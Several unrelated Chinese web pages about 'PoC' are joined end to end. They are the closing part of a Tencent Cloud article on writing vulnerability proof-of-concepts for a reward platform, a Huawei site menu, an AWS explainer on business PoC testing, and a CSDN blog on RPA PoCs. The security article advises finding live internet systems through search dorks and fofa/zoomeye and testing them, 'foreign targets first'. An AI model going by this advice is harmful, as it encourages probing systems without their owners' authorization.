等等2、找漏洞之从关键字出发:"捡洞"玩法:拿一个案例来说:在cnvd提交漏洞,有时候白帽子会填写xxxxx系统shxxxxx.php存在sql注入,cnvd发布漏洞的漏洞标题就可能是xxxxx系统shxxxxx.php存在sql注入。这时候就可以往回找,搜索引擎:intext:"xxxxx系统",可以找到线上目标或者官网的案例展示,看到类似的就可以尝试测试,最后就是类似漏洞链接、点发现。这里推荐平台:https://www.anquanke.com/vulhttps://www.cnvd.org.cn/3、漏洞复现之找目标和docker靶机通常找目标可以是fofa、zoomeye、google等搜索引擎,也可以寻找docker或者编写docker漏洞环境,这里推荐fofa、zoomeye、google寻找线上目标,原则:国外目标优先、点到为止。八、结语编写POC可以提高对漏洞原理的理解,一定程度上提高了编程开发能力,还可以规范自己的武器库,在做渗透测试项目的时候更加得心应手。学习的过程,有开始的输入也要有输出形成闭环,学习最好的方式是分享。POC++平台作为一个POC运营的平台,除了提供奖励之外,更重要的一点,是提供了一个白帽交流POC的平台。随着越来越多的白帽朋友加入平台,提交各种各样的POC,当白帽在工作需要查找漏洞的时候,POC++平台可以很好地提供相应的漏洞信息和POC,这也是我们为之骄傲的一点。

数字观星POC++平台感谢已经加入平台的用户所做出的贡献的同时,热烈盼望新鲜血液的流进。

快加入我们吧,POCer。本文参与 腾讯云自媒体分享计划,分享自微信公众号。原始发表:2020-12-03,如有侵权请联系 cloudcommunity@tencent.com 删除安全https网络安全网站渗透测试腾讯云测试服务本文分享自 Khan安全团队 微信公众号,前往查看如有侵权,请联系 cloudcommunity@tencent.com 删除。本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!安全https网络安全网站渗透测试腾讯云测试服务评论登录后参与评论0 条评论热度最新登录 后参与评论推荐阅读LV.关注文章0获赞0目录一、前言:POC&EXP二、关于POC编写流程三、WEB常见漏洞POC类型介绍1、敏感信息泄露2、未授权访问3、默认密码4、SQL注入5、XSS6、目录穿越、文件下载、文件包含7、文件上传8.远程代码、命令执行9.URL跳转四、常见漏洞POC类型编写1、敏感信息泄露2、未授权访问3、默认密码(1)回显:5、文件读取、文件下载、遍历、文件包含五、POC规范、POC框架1、pocsuite介绍2、安装以及简单使用3、POC编写步骤4、以上常见漏洞POC类型编写测试六、如何提交POC到数字观星POC平台七、如何刷POC赚奖励赚钱1、找漏洞之常用漏洞公开平台:(1)微信公众号、博客文章(2)github(3)exp-db(4)shodan(5)packetstorm(6)0day.today(7)cxsecurity.com(8)seebug(9)其他2、找漏洞之从关键字出发:3、漏洞复现之找目标和docker靶机八、结语相关产品与服务网站渗透测试网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。产品介绍2024新春采购节领券社区专栏文章阅读清单互动问答技术沙龙技术视频团队主页腾讯云TI平台活动自媒体分享计划邀请作者入驻自荐上首页技术竞赛资源技术周刊社区标签开发者手册开发者实验室关于社区规范免责声明联系我们友情链接腾讯云开发者扫码关注腾讯云开发者领取腾讯云代金券热门产品域名注册云服务器区块链服务消息队列网络加速云数据库域名解析云存储视频直播热门推荐人脸识别腾讯会议企业云CDN加速视频通话图像分析MySQL 数据库SSL 证书语音识别更多推荐数据安全负载均衡短信文字识别云点播商标注册小程序开发网站监控数据迁移Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档Copyright © 2013 - 2024 Tencent Cloud.All Rights Reserved. 腾讯云 版权所有登录 后参与评论00

POC测试指导 - 华为企业业务

POC测试指导 - 华为企业业务

本站点使用Cookies,继续浏览表示您同意我们使用Cookies。Cookies和隐私政策>

提示

尊敬的用户,您的IE浏览器版本过低,为获取更好的浏览体验,请升级您的IE浏览器。

升级

企业业务网站

选择区域/语言

登录

我的空间

退出登录

企业业务网站

企业商用产品、解决方案和云服务

华为云网站

华为云服务及解决方案

运营商网络业务网站

运营商网络解决方案、产品及服务

消费者业务网站

手机,PC和平板等智慧生活产品

集团网站

公司介绍、新闻动态、展会活动等信息

Huawei Global - English

AFRICA

Morocco - Français

South Africa - English

LATIN AMERICA

Brazil - Português

Mexico - Español

MIDDLE EAST

Saudi Arabia - English

United Arab Emirates - English

ASIA PACIFIC

China - 简体中文

Hong Kong, China - English

Indonesia - English

Japan - 日本語

Kazakhstan - русский

Malaysia - English

Philippines - English

Singapore - English

Thailand - ไทย

EUROPE

Austria - Deutsch

Czech - Czech

Europe - English

France - Français

Germany - Deutsch

Greece - Greek

Hungary - Hungarian

Italy - Italiano

Poland - polski

Spain - Español

Sweden - English

Turkey - Türkçe

Ukraine - Ukrainian

产品与解决方案

学习与技术支持

合作伙伴

如何购买

了解我们

企业业务网站

选择区域/语言

登录

我的空间

退出登录

返回主菜单

产品与解决方案

产品

企业网络

交换机

路由器

无线局域网

网络安全产品

园区网络

数据中心网络

广域网络

网络安全

网络管控&分析软件

企业网络首页

企业光网络

光接入 OptiXaccess

光传送 OptiXtrans

光终端 OptiXstar

光感知 OptiXsense

网络管控&分析软件

企业光网络首页

数据存储

全闪存存储

分布式存储

混合闪存存储

计算型存储

超融合基础设施(HCI)

智能盘框

数据保护

数据中心数据管理

数据中心虚拟化

数据存储首页

计算

鲲鹏计算

昇腾计算

通用计算

AI计算

计算首页

智能协作

华为CloudLink云视频

华为IdeaHub

华为IdeaHub Board 2

智能协作首页

企业无线

行业无线

企业微波

企业云核

企业无线首页

企业服务与软件

ICT部署与集成服务

ICT运维与辅助运营服务

培训与认证服务

软件平台与服务

企业服务与软件首页

管理系统

eSight ICT统一管理系统

华为云

华为云Stack

华为云首页

华为坤灵系列

华为坤灵系列

华为坤灵首页

产品组合

智慧园区

数据中心

数字站点

广域网络

行业

金融

电力

油气

制造

教育

医疗

机场

矿业

城市交通

公路交通

城轨

港口

铁路

口岸

建筑地产

零售

商业市场

新品发布

查看全部产品与解决方案

资料中心

返回主菜单

学习与技术支持

服务支持

智能客服

我的问题单

服务热线

工具专区

维保查询与购买

备件查询

企业集成交付平台(eISDP)

软件交付平台(ESDP)

查看全部服务支持

产品支持

产品文档

软件下载

案例库

公告

多媒体中心

信息中心 Info -

Finder

在线课堂

多语种资料

行业解决方案支持

金融

政府

交通

能源

制造

建筑地产

培训认证

学习资源

课程

& 班级

资源中心

学习商城

考试认证

职业认证

专业认证

1+X认证

HCIE专区

华为ICT学院

ICT学院介绍

课程目录

华为ICT大赛

院校解决方案

产学合作

查找ICT学院

培训伙伴

培训伙伴(HALP)介绍

查找HALP

企业培训

企业培训介绍

行业数字化转型

数字化领导力

ICT技术

培训目录

更多信息

案例故事

公告资讯

技术支持首页

互动社区

返回主菜单

合作伙伴

成为合作伙伴

成为销售合作伙伴

成为服务合作伙伴

成为解决方案合作伙伴

合作政策

合作伙伴政策

合作伙伴支持

华为人才发展中心

企业服务工具云平台

伙伴投标网设支持中心

华为伙伴营销工作台

业务公告

公告

黑名单公示

风险警示名单

窜货及违规举报

常用工具

授权函验证

找回、更换伙伴管理员账号

华为e+API中心

合作伙伴首页

返回主菜单

如何购买

线上商城

为确保您的权益得到保障,请通过华为政企授权许可的电商店铺购买华为政企产品,谨防假冒!

查看授权网店

联系华为销售

提交项目需求

在线客服

热线电话:400-822-9999

查找经销商

您可以查找附近的经销商,并直接联系他们

查找经销商

华为坤灵系列

畅享数字体验,共创亿万商机

华为商业市场

数智世界 一触即达

了解更多购买信息

返回主菜单

了解我们

探索更多

关于华为企业业务

新闻中心

市场活动

成功案例

视频中心

ICT新视界

博客

热点话题

加速行业智能化

加速行业智能化白皮书

数字之城

100个行业智能化转型故事

联系我们

全球服务热线

分支机构

搜索

搜索历史

热门搜索

网页直达

搜索推荐

首页

资料中心

POC测试指导

登录可获取更多资料立即登录

POC测试指导

关于我们

关于企业业务

新闻中心

市场活动

联系我们

查看更多

如何购买

智能客服

提交项目需求

查找经销商

通过线上商城购买

合作伙伴

成为合作伙伴

查找合作伙伴

赋能合作伙伴

查看更多

资源中心

成功案例

资料中心

视频中心

ICT新视界

博客

快速链接

华为集团

华为企业分销业务

华为消费者业务

华为运营商业务

华为数字能源

华为云

华为商城

华为亿家 App

华为亿企飞 App

企业服务 App

华为坤灵 App

华为亿家 App

企业业务移动应用

点击了解更多

华为亿企飞 App

商业市场伙伴平台

点击了解更多

华为坤灵 App

分销业务数字化平台

点击了解更多

华为企业服务 App

交付和维护移动化平台

点击了解更多

版权所有 © 华为技术有限公司 1998-2024。 保留一切权利。粤A2-20044005号

|

隐私保护

法律声明

PoC是什么意思_PoC的作用_PoC测试-亚马逊云科技

PoC是什么意思_PoC的作用_PoC测试-亚马逊云科技

跳至主要内容

Click here to return to the Amazon Web Services China homepage

全球网站

联系我们

文档

ICP备案

中文(简体) 

我的账户 

免费注册

关于我们

产品

解决方案

定价

客户支持

合作伙伴网络

Marketplace

开发者

初创公司

活动与促销

关闭

English

中文 (简体)

关闭

管理控制台

账户设置

账单与成本管理

安全证书

Click here to return to Amazon Web Services homepage

免费注册

联系我们

关于我们

产品

解决方案

定价

文档

客户支持

合作伙伴

Marketplace

开发者

初创公司

活动与促销

注册/登录

10 分钟上手教程,手把手带您入门产品操作,立即学习 »

10 分钟上手教程,手把手带您入门产品操作,立即学习 »

首页  »  云计算知识  »  PoC 是什么

PoC 是什么?

PoC(Proof of Concept),是一种被广泛应用于客户具体应用验证的测试。根据用户的要求,对所采用系统的性能指数、扩展需求等相应指标,在制定服务器上通过真实数据的运行进行测试,对其能够承载的用户数据量和运行时间进行实际验算,并根据用户业务发展需求对验证数据量进行增加,以检测系统平台的承载能力与性能水平。

新用户享受中国区域 12个月免费套餐

立即注册

联系云计算专家

首页  »  云计算知识  »  PoC 是什么

PoC 是什么?

PoC(Proof of Concept),是一种被广泛应用于客户具体应用验证的测试。根据用户的要求,对所采用系统的性能指数、扩展需求等相应指标,在制定服务器上通过真实数据的运行进行测试,对其能够承载的用户数据量和运行时间进行实际验算,并根据用户业务发展需求对验证数据量进行增加,以检测系统平台的承载能力与性能水平。

新用户享受中国区域 12个月免费套餐

立即注册

联系云计算专家

PoC 的作用

PoC 的作用

PoC(Proof of Concept),是企业在进行产品选择或实施外部项目前,一种常用的供应商能力检测工具。PoC 能够根据企业提供的产品信息进行产品功能检测,并且能够根据企业的个性化要求进行定制检测。对于产品的 API 适用性、开放性、相关技术文档的规范完整性、供应商实施能力、企业资质规模等都能够进行检测。通过全方位,多角度的验证测试,帮助企业选择出优质的产品或供应商。

PoC 环境

PoC 环境

PoC 环境是指在正式的业务运行前,为了测试业务能力而提前部署的临时测试环境,与正式生产环境有所不同。PoC 环境是相对于生产环境来说的、用于测试所建立的独立数据库,因此 PoC 环境不会对正式生产环境中的数据产生影响。通常来说,在一个项目初步确立后,为了客观地对产品及其功能进行验证,会先构建测试环境(PoC 环境),在测试环境中对功能和性能进行测试,测试结果经客户确认后,才放置于生产环境中投入运营。

PoC 测试

PoC 测试

工作启动

企业业务相关代表或负责人会对需要接受测试的供应商发布邀请与 PoC 测试工作说明,供应商接受邀请后,创设共同交流平台( PoC 协同群),便于沟通交流。进行私有化部署时,要先向供应商了解环境部署相关要求,再一同执行部署工作,并要求企业参与人员对部署情况进行完整的记录。

产品宣讲及现场集中测试

工作启动阶段完成后,根据企业提供的 PoC 测试工作说明及对应测试模块的案例或方案,供应商需要在现场对产品进行测试论证。功能测试过程中,企业相关参与人员也会参加测试,进行测试记录与意见记录,供应商在此阶段需要进行现场操作指导。

技术测评

根据企业提供的技术要求,供应商会给出相关支持文档,而企业需要对相关文档进行现场比对,对实际的检测情况进行完整记录,并根据供应商提供的资料进行对比记录。涉及到场景 Demo 设计的,企业对实施人员的能力、实施时长以及实施准确性进行比对,会有助于得到更准确的测试结果。

间歇性测试工作

间歇性测试可以在工作启动阶段同步进行。除了功能测试之外,还需要对关键用户的体验心得、易用性评价进行记录分析。该测试阶段允许企业用户进行主观判断评价,可以通过扩大间歇性测试组织范围,提高测试准确性,测试期间需做好测试用户记录。

商务验证

该部分工作在工作启动阶段,也可以同步开始。商务验证阶段,供应商应当根据企业提供的商务测评方案,积极配合测评工作。涉及到客户核实相关内容的,企业同样需要逐个进行考证。

背书归档、分析总结

该阶段一般是 PoC 测试的最后一个工作环节,在前期的测试环节中,每个阶段的工作都对参与人、时间、工作说明进行了记录,测试记录文件和企业及供应商相关的文档都要进行分类、归档。根据文件记录资料等,对每个阶段进行分析对比,并进行整体工作分析总结。

工作启动

企业业务相关代表或负责人会对需要接受测试的供应商发布邀请与 PoC 测试工作说明,供应商接受邀请后,创设共同交流平台( PoC 协同群),便于沟通交流。进行私有化部署时,要先向供应商了解环境部署相关要求,再一同执行部署工作,并要求企业参与人员对部署情况进行完整的记录。

产品宣讲及现场集中测试

工作启动阶段完成后,根据企业提供的 PoC 测试工作说明及对应测试模块的案例或方案,供应商需要在现场对产品进行测试论证。功能测试过程中,企业相关参与人员也会参加测试,进行测试记录与意见记录,供应商在此阶段需要进行现场操作指导。

技术测评

根据企业提供的技术要求,供应商会给出相关支持文档,而企业需要对相关文档进行现场比对,对实际的检测情况进行完整记录,并根据供应商提供的资料进行对比记录。涉及到场景 Demo 设计的,企业对实施人员的能力、实施时长以及实施准确性进行比对,会有助于得到更准确的测试结果。

间歇性测试工作

间歇性测试可以在工作启动阶段同步进行。除了功能测试之外,还需要对关键用户的体验心得、易用性评价进行记录分析。该测试阶段允许企业用户进行主观判断评价,可以通过扩大间歇性测试组织范围,提高测试准确性,测试期间需做好测试用户记录。

商务验证

该部分工作在工作启动阶段,也可以同步开始。商务验证阶段,供应商应当根据企业提供的商务测评方案,积极配合测评工作。涉及到客户核实相关内容的,企业同样需要逐个进行考证。

背书归档、分析总结

该阶段一般是 PoC 测试的最后一个工作环节,在前期的测试环节中,每个阶段的工作都对参与人、时间、工作说明进行了记录,测试记录文件和企业及供应商相关的文档都要进行分类、归档。根据文件记录资料等,对每个阶段进行分析对比,并进行整体工作分析总结。

如何做 PoC

如何做 PoC

构建 PoC 框架

开发人员可以直接使用现有的开源 PoC 框架,也可以自己编写 PoC 框架。在框架构建完毕后,框架的代码规范和接口相关信息也需要熟练掌握,这些信息直接关系到能否编写出高质量的 PoC。开发人员也可以不构建框架直接编写 PoC,但这样会面临较多的风险。

熟悉漏洞详情

在编写 PoC 之前,需要先全面了解漏洞详情。可以通过官方网站或其他渠道,找到一些开源 CMS 对应版本的源码,对其搭建模拟环境进行研究;对于没有官方网站的不开源漏洞,可以通过网络搜索案例进行黑盒测试,手动尝试复原漏洞产生过程,但不建议进行破坏性试验。

构建漏洞靶场

构建流程中,为保护 PoC 搭建成果,在 PoC 调试时最好利用虚拟机等手段,搭建模拟环境进行调试。为保护目标,除特殊情况外,不建议直接利用互联网上的 Web 应用调试 PoC。

选择编程语言

合适的编程语言能够让编写人员将精力集中到具体的漏洞研究之上,无需为了实现辅助功能而耗费大量的时间与精力,大大提高编程的效率与质量,对于 PoC 的编写也是同样。

构建 PoC 框架

开发人员可以直接使用现有的开源 PoC 框架,也可以自己编写 PoC 框架。在框架构建完毕后,框架的代码规范和接口相关信息也需要熟练掌握,这些信息直接关系到能否编写出高质量的 PoC。开发人员也可以不构建框架直接编写 PoC,但这样会面临较多的风险。

熟悉漏洞详情

在编写 PoC 之前,需要先全面了解漏洞详情。可以通过官方网站或其他渠道,找到一些开源 CMS 对应版本的源码,对其搭建模拟环境进行研究;对于没有官方网站的不开源漏洞,可以通过网络搜索案例进行黑盒测试,手动尝试复原漏洞产生过程,但不建议进行破坏性试验。

构建漏洞靶场

构建流程中,为保护 PoC 搭建成果,在 PoC 调试时最好利用虚拟机等手段,搭建模拟环境进行调试。为保护目标,除特殊情况外,不建议直接利用互联网上的 Web 应用调试 PoC。

选择编程语言

合适的编程语言能够让编写人员将精力集中到具体的漏洞研究之上,无需为了实现辅助功能而耗费大量的时间与精力,大大提高编程的效率与质量,对于 PoC 的编写也是同样。

新用户入门学习计划

从 0 到 1 轻松上手云服务,内容涵盖,成本管理、上手训练、开发资源

立即学习 

亚马逊云科技产品的 PoC 优势

亚马逊云科技产品的 PoC 优势

Amazon CodeBuild 是一种完全托管的持续集成服务,可编译源代码、运行测试并生成可随时部署的软件包。借助 CodeBuild,无需预置、管理和扩展自己的构建服务器。CodeBuild 可持续扩展并同时处理多个构建任务,因此客户的构建请求无需在队列中等待。客户可以使用预先打包的构建环境快速上手,也可以创建使用自己的构建工具的自定义构建环境。

完全托管的构建服务

Amazon CodeBuild 无需设置、修补、更新和管理客户的构建服务器和软件。没有要安装或管理的软件。

持续扩展

Amazon CodeBuild 可自动扩展和缩减以满足客户的构建量。它会立即处理客户提交的每个构建,并且可以同时单独运行构建任务,这意味着客户的构建请求无需在队列中等待。

持续集成和交付

Amazon CodeBuild 属于亚马逊云科技 Code Services 系列,可用于创建完整的自动化软件发布工作流程,以实现持续集成和交付 (CI/CD)。客户还可以将 CodeBuild 集成到现有的 CI/CD 工作流程中。

完全托管的构建服务

Amazon CodeBuild 无需设置、修补、更新和管理客户的构建服务器和软件。没有要安装或管理的软件。

持续扩展

Amazon CodeBuild 可自动扩展和缩减以满足客户的构建量。它会立即处理客户提交的每个构建,并且可以同时单独运行构建任务,这意味着客户的构建请求无需在队列中等待。

持续集成和交付

Amazon CodeBuild 属于亚马逊云科技 Code Services 系列,可用于创建完整的自动化软件发布工作流程,以实现持续集成和交付 (CI/CD)。客户还可以将 CodeBuild 集成到现有的 CI/CD 工作流程中。

亚马逊云科技热门云产品

亚马逊云科技热门云产品

Amazon EC2 Auto Scaling

弹性伸缩计算能力以满足业务需求。

了解 Amazon EC2 Auto Scaling

Amazon CodeBuild

通过持续扩展构建和测试代码。

了解 Amazon CodeBuild

Amazon ECS

高度安全、可靠且可扩展的容器运行方式。

了解 Amazon ECS

Amazon Batch

任意规模完全受管的批处理。

了解 Amazon Batch

欢迎加入亚马逊云科技培训中心

从 0 到 1 轻松上手云服务,获取更多官方开发资源及培训教程

了解详情

准备好体验亚马逊云科技提供的云服务了吗?

新用户享受中国区域 12 个月免费套餐

立即注册

联系我们

在线咨询架构师

亚马逊云科技产品入门

产品的用户指南、培训和教程,立即查看 »

亚马逊云科技客户成功案例

亚马逊云科技帮助客户提高交付灵活性、可扩展性和可靠性,立即查看 »

云计算知识合集

一站直达最新对云计算资讯详解,助您尽快掌握和使用云计算服务,立即查看 »

开始使用亚马逊云科技免费构建

开始使用亚马逊云科技免费构建

中国区域免费套餐

全球区域免费套餐

关闭

在线咨询

专家实时解答您的售前、售后问题

热线

1010 0766

由光环新网运营的

北京区域

1010 0966

由西云数据运营的

宁夏区域

联系顾问

让解决方案顾问与您联系

关闭

热线

1010 0766

由光环新网运营的

北京区域

1010 0966

由西云数据运营的

宁夏区域

在线咨询

专家实时解答您的售前、售后问题

联系顾问

让解决方案顾问与您联系

 亚马逊云科技官方微博

|

 亚马逊云科技中国博客

|

 在线咨询云计算专家

由西云数据运营的亚马逊云科技中国(宁夏)区域咨询热线:1010 0966

|

由光环新网运营的亚马逊云科技中国(北京)区域咨询热线:1010 0766

免费注册

关于我们

亚马逊云科技简介

亚马逊云科技中国

产品动态

新闻中心

分析师报告

亚马逊云科技中文博客

客户成功

什么是云计算?

什么是大数据?

什么是云存储?

什么是人工智能?

什么是数据湖?

产品与解决方案

所有产品

计算

存储

数据库

网络和内容分发

管理工具

安全性、身份与合规性

分析

应用程序服务

消息收发

物联网

解决方案

资源与支持

开发人员工具

价格计算器

支持计划

客户支持 FAQ

服务运行状况仪表板

文档

云计算文章

ICP 备案服务

等保合规

管理账户

管理控制台

账单与成本管理

个人信息

支付方法

安全证书

请求提升服务限额

联系我们

亚马逊云科技中国简介

我们致力于为中国的软件开发人员和企业提供安全、灵活、可靠且低成本的 IT 基础设施资源,帮助他们实现创新和快速扩大企业规模。

"AWS" 是"Amazon Web Services"的缩写,在此网站不作为商标展示。

详细了解怎样在中国使用 亚马逊云科技服务 »

Language

English

中文 (简体)

网站条款

|

隐私

|

法律条款

|

合规提示

|

网站地图

|

友情链接

宁公网安备 64050202000147号

|

宁ICP备17000743号-11

终止对 Internet Explorer 的支持

知道了

我们对 Internet Explorer 的支持将于 07/31/2022 结束。受支持的浏览器包括 Chrome、Firefox、Edge 和 Safari。

知道了

POC阶段需要注意什么-CSDN博客

>

POC阶段需要注意什么-CSDN博客

POC阶段需要注意什么

最新推荐文章于 2021-02-09 00:00:25 发布

Mlxg2234

最新推荐文章于 2021-02-09 00:00:25 发布

阅读量4k

收藏

1

点赞数

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文链接:https://blog.csdn.net/liutao261311/article/details/104490799

版权

POC(Proof of concept),常译作“概念验证”,是企业部署RPA的必经环节。通过对制作好的自动化进行测试,以发现其局限性,并帮助确保机器人按预期工作。 做POC其实是为了更好地施行RPA。因此在部署初期,应当做好以下几点: 1、挑选那些有固定规则、逻辑性强,不需要人工参与,又有大量高度重复的场景进行POC。这样便于客户快速看到成果,由点及面能快速扩展开来。

2、制定方案,首要确定最有可能看到具有积极业务影响的流程,通过ROI分析,挑选最优选择,确保提升实现业务流程现代化的可能性,从而部署后获得最大价值。

3、必须要考虑RPA部署后的可维护性,这是重要测试指标之一。RPA部署必须具备较强的可维护性,RPA操作脚本必须具备参数化调整,同时业必须提供模块化组件,确保在系统调整时候能够快速响应,易于维护。

4、慎重考虑供应商是否有合理丰富的安全机制,可以保证RPA部署后的系统安全性。

公众号:RPA之家,也可以私信我加我微信拉进群

优惠劵

Mlxg2234

关注

关注

0

点赞

1

收藏

觉得还不错?

一键收藏

知道了

0

评论

POC阶段需要注意什么

POC(Proof of concept),常译作“概念验证”,是企业部署RPA的必经环节。通过对制作好的自动化进行测试,以发现其局限性,并帮助确保机器人按预期工作。做POC其实是为了更好地施行RPA。因此在部署初期,应当做好以下几点:1、挑选那些有固定规则、逻辑性强,不需要人工参与,又有大量高度重复的场景进行POC。这样便于客户快速看到成果,由点及面能快速扩展开来。2、制定方案,首要确定最...

复制链接

扫一扫

常见Exp漏洞POC集合

01-21

该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。

了解POC测试

什么红烧鱼

09-26

1万+

POC测试概述

参与评论

您还未登录,请先

登录

后发表或查看评论

GMSL2 POC电路官方推荐型号

07-30

GMSL2 POC电路官方推荐型号

东南大学poc设计报告poc.pdf

03-27

东南大学poc实验设计报告,包括代码东南大学poc实验设计报告,包括代码东南大学poc实验设计报告,包括代码

用友各种类型漏洞的poc

06-15

用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。

技服作业流程

嚴 帅的博客

07-31

1476

目录

一、项目中的技服

二、POC测试

2.1 业务流程

2.2 举例

三、交付实施

3.1 价值交付

四、售后服务

4.1 举例

4.2 重大售后问题处理

作为技术服务体系,主要的工作和任务分为3个大块,POC测试、交付实施、售后服务。需要我们围绕客户口碑,开展以产品试用形式的标准化POC测试、销售产品的交付安装调试、已销售产品的售后问题处理工作。

一、项目中的技服

首先我们了解一下一个项目从实施到完成需要经历的阶段:

而在整个项目中从内部项目阶段来看技服需要完成的任务.

rpa项目poc_RPA 实施的四个阶段

weixin_35368330的博客

12-31

3887

机器人过程自动化机器人过程自动化(RPA) 是几乎所有大型组织都希望投资的最新技术趋势,用于提高运营效率/吞吐量并降低成本。根据德勤的一项调查,作为实验开始 RPA 之旅的组织现在陷入了困境,他们正遭受 IT 问题、流程复杂性、不切实际的期望和试点方法的困扰。要最大限度地发挥 RPA 的影响,需要在思维定型和方法上从实验转向转型。本文重点介绍 RPA 就绪性以及导致 RPA 实现成功的各种规划阶段...

测试bug分析图_银行功能测试入门篇(2)

weixin_39811193的博客

12-09

968

有了功能测试基础了解,结合从事银行外包项目经验,在此跟大家分享如何快速做外包功能测试。希望以下工作流程对大家有用。!敢想敢拼敢干!1、认知需求从行方拿到测试范围,并向开发经理寻到最终需求,并解读理解后再与业务人员确认所测流程。之后测试组长给需求大体模块进行划分工作,评估工作量,把评估工作量发送给行方项目经理评审,待行方负责人审核通过,执行下一步工作:需求调研。2、需求确认,编写测试计划,分配测试模...

如何做IT项目PoC测试

热门推荐

木东的博客

11-25

1万+

PoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。

验证内容

1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能;

2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求;

3、产品...

poc测试环境准备_POC测试经验总结

weixin_39885683的博客

02-09

2295

假期还没有结束,一个个POC测试已经约起来了。9月份几乎每天都有三四个POC在同步进行,我的很多精力都是在盯POC结果。有一种声音在告诉我你不要管技术了,有一波人在不停给我打电话,有客户、有销售、有合作伙伴、有领导,他们说这个测试你一定要盯......我的9月份就是处于这是纠结和撕扯中,也下场做了POC。现将自己的调优思路分享给大家:一、明确测试目标、测试计划,与相关干系人达成一致意见。我们的工作...

POC_design_poc设计_

10-01

实现POC联合CPU以及PRINTER实现打印

04018717_POC_Project_POC_

09-29

VIVADO 基于VERILOG写的POC程序

POC供电解析.pdf

11-13

POC(Power Over Coaxial)一种基于同轴线的信号传输,电源叠加的技术。在同

轴电缆传输中传输高频信号、又传输电源,在一根同轴线上传输。

VSAN POC测试项目&报告_模板

02-19

为了完整地检验VMware VSAN 环境下性能与可靠性,测试环境要求至少三台服务器用于安装VMware的ESXi Server(注:建议和引导客户准备至少4台服务器,方便于测试在线热添加VSAN节点服务器这个功能),每台服务器建议最少配置1个SSD,建议服务器至少配置两颗CPU。整个虚拟架构由单独的Virtual Center管理服务器统一管理。另外根据需要,客户访问机(可用个人笔记本电脑代替)

poc编写真实案例文档

07-21

poc编写真实案例文档

Goby&Poc.zip

09-15

Goby&Poc 额外161个POC

每个Python开发者必须知道的事:顶级编程技巧和最佳实践大公开!.zip

03-06

python

知识领域: Python 编程

技术关键词: 核心知识点, 代码优化, 高级技巧, 性能提升, 最佳实践

内容关键词: 数据类型, 控制流, 函数, 类与对象, 模块, 异常处理, 文件操作, 并发编程, 异步编程, 代码格式化, 文档字符串, 类型注解, 单元测试, 版本控制

用途: 适用于初学者至中级开发者的技能提升,帮助程序员构建坚实的Python基础,提高编写高效、可维护代码的能力。

(基于Springboot的Java毕业设计)新闻稿件管理系统(源码+演示视频+说明文档).rar

03-06

(基于Springboot的Java毕业设计)新闻稿件管理系统(源码+演示视频+说明文档).rar

【项目技术】

开发语言:Java

框架:springboot

架构:B/S

数据库:mysql

【实现功能】

本新闻稿件管理系统管理员功能有个人中心,用户管理,记者管理,审批员管理,新闻分类管理,新闻信息管理,系统管理等。记者发布新闻信息,审批员进行审核,用户进行查看。

基于Hadoop和spark由java和python语言开发的电影推荐系统.zip

最新发布

03-06

基于spark的系统

poc测试需要哪些资源

11-29

进行 POC(概念证明)测试需要一些资源。首先,需要有足够的时间来规划、设计和执行测试。这意味着需要相关团队的充分支持和配合,以及为测试活动安排合理的时间表。其次,需要足够的人力资源,包括测试人员、开发人员和项目经理等,他们需要共同努力,确保测试能够按计划进行。第三,需要适当的测试环境和设备。这可能包括硬件设备、软件工具、网络连接等,以确保测试环境的完整性和稳定性。此外,还需要足够的资金来支持测试活动,包括测试工具的购买和维护、团队成员的工资和奖金等。最后,也需要相关的知识和技能。测试人员需要具备相关领域的知识和经验,以便能够有效地执行测试活动。同时,团队其他成员也需要相应的技能,以便能够协助测试工作的进行。

总之,进行 POC 测试需要充足的时间、人力资源、测试环境和设备、资金支持以及相关领域的知识和技能。只有当这些资源都得到合理的配置和管理,测试活动才能够顺利进行,并得到有效的结果。

“相关推荐”对你有帮助么?

非常没帮助

没帮助

一般

有帮助

非常有帮助

提交

Mlxg2234

CSDN认证博客专家

CSDN认证企业博客

码龄8年

暂无认证

482

原创

12万+

周排名

93万+

总排名

66万+

访问

等级

9657

积分

280

粉丝

111

获赞

61

评论

922

收藏

私信

关注

热门文章

AA视频教程1

17487

UiPath官网手把手中文教程

15405

UiPath中文教程PDF

10955

UiPath读取Excel

9435

UiPath手把手中文教程PDF

9340

最新评论

Automation Anywhere视频教程

qq_27493349:

教程是中文版的吗

UiBot 读取Excel写入到网页

cutwateragain:

uibot软件扩展里要安装谷歌的插件就可以用了

UiBot 读取Excel写入到网页

华璃:

是只能打开IE浏览器吗?我试了谷歌和微软浏览器都打不开

UiPath剪贴板操作的介绍和使用

奔跑的老姜菜:

跑不起来怎么办呢

【云扩RPA】DesktopAutomation(1)

weixin_54440342:

识别到“录制页面” 然后运行 就打不开那个录制页面

您愿意向朋友推荐“博客详情页”吗?

强烈不推荐

不推荐

一般般

推荐

强烈推荐

提交

最新文章

RPA的特点有哪些?

RPA的历史

RPA场景

2022年50篇

2021年76篇

2020年254篇

2019年115篇

目录

目录

最新文章

RPA的特点有哪些?

RPA的历史

RPA场景

